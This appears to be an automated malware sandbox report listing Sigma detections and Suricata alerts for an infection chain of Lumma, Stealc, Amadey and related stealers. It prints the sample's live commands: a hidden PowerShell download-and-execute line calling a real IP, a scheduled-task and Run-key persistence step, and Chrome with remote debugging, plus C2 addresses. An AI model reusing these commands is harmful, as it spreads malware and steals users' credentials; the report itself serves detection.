Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0436fcd702.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe, ParentProcessId: 2164, ParentProcessName: ec93a94e48.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ProcessId: 5356, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe, ParentProcessId: 2164, ParentProcessName: ec93a94e48.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ProcessId: 5356, ProcessName: mshta.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe", ParentImage: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe, ParentProcessId: 7648, ParentProcessName: AGDDD2MYZL6KQO94XW.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 4432, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0436fcd702.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3940, TargetFilename: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5040, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7696, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3940, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:13.389678+0100	2028371	3	Unknown Traffic	192.168.2.4	50154	172.67.181.203	443	TCP
2025-02-01T21:36:13.893133+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.181.203	443	TCP
2025-02-01T21:36:14.911727+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.181.203	443	TCP
2025-02-01T21:36:16.229604+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.181.203	443	TCP
2025-02-01T21:36:17.736684+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.181.203	443	TCP
2025-02-01T21:36:18.981565+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.181.203	443	TCP
2025-02-01T21:36:20.456084+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.181.203	443	TCP
2025-02-01T21:36:21.832510+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.181.203	443	TCP
2025-02-01T21:36:25.783590+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	172.67.181.203	443	TCP
2025-02-01T21:37:23.115670+0100	2028371	3	Unknown Traffic	192.168.2.4	49874	172.67.139.144	443	TCP
2025-02-01T21:37:24.110927+0100	2028371	3	Unknown Traffic	192.168.2.4	49882	172.67.139.144	443	TCP
2025-02-01T21:37:25.723343+0100	2028371	3	Unknown Traffic	192.168.2.4	49894	172.67.139.144	443	TCP
2025-02-01T21:37:27.690825+0100	2028371	3	Unknown Traffic	192.168.2.4	49910	172.67.139.144	443	TCP
2025-02-01T21:37:29.238683+0100	2028371	3	Unknown Traffic	192.168.2.4	49922	172.67.139.144	443	TCP
2025-02-01T21:37:31.266179+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	172.67.139.144	443	TCP
2025-02-01T21:37:33.478423+0100	2028371	3	Unknown Traffic	192.168.2.4	49950	172.67.139.144	443	TCP
2025-02-01T21:37:33.714919+0100	2028371	3	Unknown Traffic	192.168.2.4	49951	172.67.181.203	443	TCP
2025-02-01T21:37:34.389900+0100	2028371	3	Unknown Traffic	192.168.2.4	49958	172.67.181.203	443	TCP
2025-02-01T21:37:35.743778+0100	2028371	3	Unknown Traffic	192.168.2.4	49969	172.67.139.144	443	TCP
2025-02-01T21:37:36.092570+0100	2028371	3	Unknown Traffic	192.168.2.4	49970	172.67.181.203	443	TCP
2025-02-01T21:37:37.880812+0100	2028371	3	Unknown Traffic	192.168.2.4	49982	172.67.181.203	443	TCP
2025-02-01T21:37:39.721772+0100	2028371	3	Unknown Traffic	192.168.2.4	49999	172.67.181.203	443	TCP
2025-02-01T21:37:43.110385+0100	2028371	3	Unknown Traffic	192.168.2.4	50020	172.67.181.203	443	TCP
2025-02-01T21:37:44.987142+0100	2028371	3	Unknown Traffic	192.168.2.4	50036	172.67.181.203	443	TCP
2025-02-01T21:37:47.546724+0100	2028371	3	Unknown Traffic	192.168.2.4	50054	172.67.181.203	443	TCP
2025-02-01T21:37:52.460790+0100	2028371	3	Unknown Traffic	192.168.2.4	50083	172.67.181.203	443	TCP
2025-02-01T21:37:53.285697+0100	2028371	3	Unknown Traffic	192.168.2.4	50086	172.67.181.203	443	TCP
2025-02-01T21:37:57.835160+0100	2028371	3	Unknown Traffic	192.168.2.4	50090	172.67.181.203	443	TCP
2025-02-01T21:38:00.351202+0100	2028371	3	Unknown Traffic	192.168.2.4	50093	172.67.181.203	443	TCP
2025-02-01T21:38:06.685697+0100	2028371	3	Unknown Traffic	192.168.2.4	50100	172.67.181.203	443	TCP
2025-02-01T21:38:08.806701+0100	2028371	3	Unknown Traffic	192.168.2.4	50115	172.67.181.203	443	TCP
2025-02-01T21:38:09.678276+0100	2028371	3	Unknown Traffic	192.168.2.4	50123	172.67.181.203	443	TCP
2025-02-01T21:38:11.449981+0100	2028371	3	Unknown Traffic	192.168.2.4	50133	172.67.181.203	443	TCP
2025-02-01T21:38:16.180826+0100	2028371	3	Unknown Traffic	192.168.2.4	50138	172.67.181.203	443	TCP
2025-02-01T21:38:18.097918+0100	2028371	3	Unknown Traffic	192.168.2.4	50140	172.67.181.203	443	TCP
2025-02-01T21:38:19.127666+0100	2028371	3	Unknown Traffic	192.168.2.4	50141	172.67.181.203	443	TCP
2025-02-01T21:38:28.085488+0100	2028371	3	Unknown Traffic	192.168.2.4	50146	172.67.181.203	443	TCP
2025-02-01T21:38:29.360871+0100	2028371	3	Unknown Traffic	192.168.2.4	50147	172.67.181.203	443	TCP
2025-02-01T21:38:33.876422+0100	2028371	3	Unknown Traffic	192.168.2.4	50148	172.67.181.203	443	TCP
2025-02-01T21:38:35.444578+0100	2028371	3	Unknown Traffic	192.168.2.4	50149	172.67.181.203	443	TCP
2025-02-01T21:38:36.894432+0100	2028371	3	Unknown Traffic	192.168.2.4	50150	172.67.181.203	443	TCP
2025-02-01T21:38:38.538501+0100	2028371	3	Unknown Traffic	192.168.2.4	50151	172.67.181.203	443	TCP
2025-02-01T21:38:55.597610+0100	2028371	3	Unknown Traffic	192.168.2.4	50153	172.67.181.203	443	TCP

ET MALWARE CryptBot CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:18.624861+0100	2059018	1	A Network Trojan was detected	192.168.2.4	49845	94.156.102.240	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:14.162074+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.181.203	443	TCP
2025-02-01T21:36:15.405191+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.181.203	443	TCP
2025-02-01T21:36:26.373523+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	172.67.181.203	443	TCP
2025-02-01T21:37:23.615699+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49874	172.67.139.144	443	TCP
2025-02-01T21:37:24.609684+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49882	172.67.139.144	443	TCP
2025-02-01T21:37:33.885184+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49951	172.67.181.203	443	TCP
2025-02-01T21:37:34.889779+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49958	172.67.181.203	443	TCP
2025-02-01T21:37:36.223998+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49969	172.67.139.144	443	TCP
2025-02-01T21:37:48.067108+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50054	172.67.181.203	443	TCP
2025-02-01T21:37:52.794290+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50083	172.67.181.203	443	TCP
2025-02-01T21:37:53.835908+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50086	172.67.181.203	443	TCP
2025-02-01T21:38:09.921580+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50123	172.67.181.203	443	TCP
2025-02-01T21:38:12.247385+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50133	172.67.181.203	443	TCP
2025-02-01T21:38:18.630393+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50140	172.67.181.203	443	TCP
2025-02-01T21:38:28.319728+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50146	172.67.181.203	443	TCP
2025-02-01T21:38:29.889762+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50147	172.67.181.203	443	TCP
2025-02-01T21:38:58.212808+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50154	172.67.181.203	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:14.162074+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	172.67.181.203	443	TCP
2025-02-01T21:37:23.615699+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49874	172.67.139.144	443	TCP
2025-02-01T21:37:33.885184+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49951	172.67.181.203	443	TCP
2025-02-01T21:37:52.794290+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50083	172.67.181.203	443	TCP
2025-02-01T21:38:09.921580+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50123	172.67.181.203	443	TCP
2025-02-01T21:38:28.319728+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50146	172.67.181.203	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:15.405191+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	172.67.181.203	443	TCP
2025-02-01T21:37:24.609684+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49882	172.67.139.144	443	TCP
2025-02-01T21:37:34.889779+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49958	172.67.181.203	443	TCP
2025-02-01T21:37:53.835908+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50086	172.67.181.203	443	TCP
2025-02-01T21:38:12.247385+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50133	172.67.181.203	443	TCP
2025-02-01T21:38:29.889762+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50147	172.67.181.203	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:23.115670+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49874	172.67.139.144	443	TCP
2025-02-01T21:37:24.110927+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49882	172.67.139.144	443	TCP
2025-02-01T21:37:25.723343+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49894	172.67.139.144	443	TCP
2025-02-01T21:37:27.690825+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49910	172.67.139.144	443	TCP
2025-02-01T21:37:29.238683+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49922	172.67.139.144	443	TCP
2025-02-01T21:37:31.266179+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49933	172.67.139.144	443	TCP
2025-02-01T21:37:33.478423+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49950	172.67.139.144	443	TCP
2025-02-01T21:37:35.743778+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.4	49969	172.67.139.144	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:48.443635+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.4	49998	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:16.663906+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49828	185.215.113.43	80	TCP
2025-02-01T21:37:22.289090+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49866	185.215.113.43	80	TCP
2025-02-01T21:37:27.841641+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49907	185.215.113.43	80	TCP
2025-02-01T21:37:33.301872+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49947	185.215.113.43	80	TCP
2025-02-01T21:37:38.640054+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49987	185.215.113.43	80	TCP
2025-02-01T21:37:43.558506+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50022	185.215.113.43	80	TCP
2025-02-01T21:37:48.384564+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50055	185.215.113.43	80	TCP
2025-02-01T21:37:54.476134+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50087	185.215.113.43	80	TCP
2025-02-01T21:38:00.243086+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50092	185.215.113.43	80	TCP
2025-02-01T21:38:06.681309+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50099	185.215.113.43	80	TCP
2025-02-01T21:38:16.187745+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50137	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:18.719193+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.4	49998	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:37:22.578923+0100	2059149	1	Domain Observed Used for C2 Detected	192.168.2.4	53275	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:35.435457+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49746	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:35.425900+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49746	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:35.706105+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49746	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:36.892982+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49746	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:36:35.714578+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49746	TCP
2025-02-01T21:38:06.930868+0100	2044247	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.4	50098	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:13.200426+0100	2051831	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.4	50134	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T21:38:06.930642+0100	2049087	1	A Network Trojan was detected	192.168.2.4	50098	116.202.5.153	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
